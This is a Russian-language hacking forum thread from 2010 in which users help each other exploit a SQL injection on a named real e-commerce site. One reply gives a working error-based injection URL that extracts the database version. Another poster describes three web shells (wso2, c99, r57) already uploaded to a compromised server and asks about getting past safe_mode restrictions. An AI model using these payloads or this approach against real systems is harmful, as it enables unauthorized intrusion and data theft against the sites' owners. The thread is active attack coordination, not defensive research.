 |
|
09.08.2010, 17:31
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами:
8860452
Репутация:
0
|
|
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
|
|
|
09.08.2010, 17:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Koren
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
выложи линк посмотрим...
|
|
|
|
09.08.2010, 17:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Koren
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
плохо искал если не нашел >>>>>
|
|
|
|
09.08.2010, 18:34
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от manmerritt0
...Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off
....
Так проведем простой эксперимент: залей на сервак простой скриптик с таким содержанием:
Запроси его через web. Какое значение имеет параметр safe_mode?
|
|
|
|
09.08.2010, 20:08
|
|
Новичок
Регистрация: 31.07.2010
Сообщений: 8
С нами:
8306966
Репутация:
0
|
|
Сообщение от None
Запроси его через web. Какое значение имеет параметр safe_mode?
Запросил.
Local value: safe_mod on, + ограничения с помощью open_basedir.
Master value :safe_mod off, open_basedir: no_value
Насколько я понимаю на master value не стоит обращать внимание? Это параметры для рута?
|
|
|
|
10.08.2010, 00:44
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Привет, друзья.
А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
|
|
|
|
10.08.2010, 00:54
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 543
С нами:
8885780
Репутация:
672
|
|
Сообщение от fl00der
Привет, друзья.
А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
/threadnav12123-1-10.html
/thread23501.html
|
|
|
|
10.08.2010, 01:05
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Спасибо!
|
|
|
|
10.08.2010, 02:19
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
С нами:
8860452
Репутация:
0
|
|
подсказывали подсказывали, не получилось ничего(
Сообщение от None
http://www.sweetstems.com.au/product.php?id=82+union+select+1,2,3,4--
помогаем.. плыз |
|
|
|
10.08.2010, 02:35
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 543
С нами:
8885780
Репутация:
672
|
|
Сообщение от Koren
подсказывали подсказывали, не получилось ничего(
помогаем.. плыз
http://www.sweetstems.com.au/product.php?id=82+or+(1,1)=(select+count(0),concat ((select+version()+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))from(information_schem a.tables)+group+by+2)--+
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
